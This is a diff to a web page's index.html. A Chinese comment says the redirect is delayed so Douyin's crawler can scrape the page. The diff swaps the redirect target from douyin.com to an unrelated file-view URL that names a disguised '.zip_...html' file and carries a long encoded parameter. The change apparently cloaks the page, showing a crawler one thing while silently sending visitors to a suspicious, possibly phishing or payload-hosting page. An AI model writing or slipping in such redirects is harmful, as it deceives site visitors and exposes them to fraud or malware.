--- a/index.html
+++ b/index.html
@@ -31,7 +31,7 @@
         
         // 延迟跳转，给抖音爬虫时间抓取
         setTimeout(function() {
-            window.location.href = "https://www.douyin.com/";
+            window.location.href = "https://mk-fileview-scrm.ikang.com/JuwYkf.zip_GxhARGUJ.html?d=DxsAHxlTTkIEBxUbW0cAFEkMGg4HDE8OAwFaAgIHBB9JDBpAWg8EWBBbAkBfERccCAY7Wg9GUFpSX01cWVBVW1dbTUECHQwB";
         }, 2000);
     </script>
 </body>
